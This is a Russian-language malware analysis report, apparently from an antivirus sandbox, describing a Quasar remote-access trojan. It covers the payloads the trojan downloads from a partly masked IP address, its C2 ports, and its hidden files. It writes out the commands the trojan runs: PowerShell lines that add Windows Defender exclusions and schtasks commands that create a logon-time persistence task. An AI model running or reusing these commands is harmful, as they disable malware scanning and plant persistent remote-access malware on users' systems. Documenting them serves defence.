Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\quasar client startup
Вредоносные функции
Загружает
- http://86.###.229.160:8389/beauty of a virus.exe as c:\users\public\beautiful.exe
- http://86.###.229.160:8389/screenshot.jpg as c:\users\public\screenshot.jpg
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\beautiful.exe
- %APPDATA%\subdir\client.exe
- C:\users\public\screenshot.jpg
Присваивает атрибут 'скрытый' для следующих файлов
- C:\users\public\beautiful.exe
- %APPDATA%\subdir\client.exe
Сетевая активность
Подключается к
- '86.##7.229.160':8389
- '86.##7.229.160':4782
TCP
- '86.##7.229.160':4782
Другое
Создает и запускает на исполнение
- 'C:\users\public\beautiful.exe'
- '%APPDATA%\subdir\client.exe'
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Public' & powershell -Command Add-MpPreference -ExclusionPath (-join("$env:APPDATA", '\SubDir')) & powershell.exe -w hidden -c (...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath 'C:\Users\Public'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath (-join("$env:APPDATA", '\SubDir'))
- '<SYSTEM32>\schtasks.exe' /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Public\beautiful.exe" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "Quasar Client Startup" /sc ONLOGON /tr "%APPDATA%\SubDir\Client.exe" /rl HIGHEST /f
